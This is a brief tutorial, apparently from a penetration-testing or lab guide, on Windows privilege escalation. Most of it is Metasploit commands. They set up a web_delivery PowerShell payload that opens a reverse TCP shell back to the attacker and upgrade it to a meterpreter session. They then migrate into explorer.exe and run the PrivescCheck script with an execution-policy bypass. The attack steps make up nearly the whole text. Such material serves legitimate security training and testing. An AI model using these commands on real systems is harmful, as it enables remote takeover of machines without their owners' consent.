Identifying Windows Privilege Escalation

A tool we can use for this is the PrivescCheck script. You can get it here

Using the web delivery exploit, this generates a powershell code we can run on the target’s machine, hence providing us with a command shell that can be upgraded to a meterpreter shell

use exploit/multi/script/web_delivery
set target PSH\  (Binary)
set payload windows/shell/reverse_tcp 
set PSH-EncodedCommand false
set LHOST
exploit

copy the powerhsell code and run it on the target’s cmd , you should get a command shell session when you run it To upgrade to a meterpreter shell

use post/multi/manage/shell_to_meterpreter
set SESSION
set LHOST
set WIN_TRANSFER VBS
exploit

Migrate to a x64 architecture

pgrep explorer.exe
migrate 777

To escalate privileges using the Privesccheck powershell script

powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"